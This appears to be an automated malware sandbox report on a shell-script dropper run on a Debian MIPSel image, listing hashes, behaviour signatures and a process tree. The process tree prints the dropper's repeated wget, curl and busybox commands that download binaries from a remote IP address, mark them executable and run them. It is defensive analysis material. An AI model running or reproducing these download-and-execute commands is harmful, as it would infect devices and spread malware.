Analysis
-
max time kernel
71s -
max time network
72s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/10/2024, 01:26
Static task
static1
Behavioral task
behavioral1
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
-
Size
10KB
-
MD5
10f1892ae230c88400e80e691b208153
-
SHA1
f83482329b6b46cc1ef37aee0eba3b36ef1d7756
-
SHA256
3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01
-
SHA512
7d646519673f50ee4afd8cbd7b42a63c35cd5b58a5d217aa6d9bcb54078a446f27439806aef4602df29f2576bea05e7b0b88a87a7969c96ce8fb3e11ce13172f
-
SSDEEP
192:Omh5SdBY8PQJw8tERk4pw8tE3Yh5SdBiG:Omh5SdBdPQaRk463Yh5SdBX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 885 chmod 933 chmod 969 chmod 957 chmod 816 chmod 861 chmod 879 chmod 921 chmod 783 chmod 810 chmod 867 chmod 897 chmod 951 chmod 759 chmod 838 chmod 909 chmod 945 chmod 873 chmod 903 chmod 891 chmod 915 chmod 939 chmod 975 chmod 741 chmod 747 chmod 927 chmod 963 chmod 981 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z 742 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO 748 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S 761 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME 784 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV 811 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH 817 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal 839 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V 862 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS 868 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm 874 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ 880 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv 886 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 892 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj 898 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm 904 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ 910 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv 916 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 922 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj 928 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z 934 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO 940 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S 946 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME 952 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV 958 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH 964 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal 970 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V 976 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS 982 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 977 rm 843 wget 859 busybox 862 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V 976 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V 974 busybox 850 curl 863 rm 972 wget 973 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S curl File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH curl File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS curl File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV curl File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv curl File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ curl File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv curl File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO curl File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS curl File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal curl File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 curl File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO curl File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V curl File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S curl File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm curl File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj curl File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV curl File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z curl File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ curl File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z curl File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME curl File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 curl File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj curl File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME curl File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH curl File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal curl File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm curl File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V curl
Processes
-
/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:720
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:739
-
-
/bin/chmodchmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:746
-
-
/bin/chmodchmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:756
-
-
/bin/chmodchmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵
- Executes dropped EXE
PID:761
-
-
/bin/rmrm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S2⤵PID:763
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:764
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:771
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:778
-
-
/bin/chmodchmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME2⤵PID:787
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:788
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:808
-
-
/bin/chmodchmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:815
-
-
/bin/chmodchmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH2⤵PID:818
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:821
-
-
/bin/chmodchmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal2⤵PID:842
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:843
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:859
-
-
/bin/chmodchmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:862
-
-
/bin/rmrm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V2⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:866
-
-
/bin/chmodchmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:872
-
-
/bin/chmodchmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:878
-
-
/bin/chmodchmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:884
-
-
/bin/chmodchmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:890
-
-
/bin/chmodchmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:896
-
-
/bin/chmodchmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:902
-
-
/bin/chmodchmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:908
-
-
/bin/chmodchmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:914
-
-
/bin/chmodchmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:920
-
-
/bin/chmodchmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H82⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:926
-
-
/bin/chmodchmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:932
-
-
/bin/chmodchmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
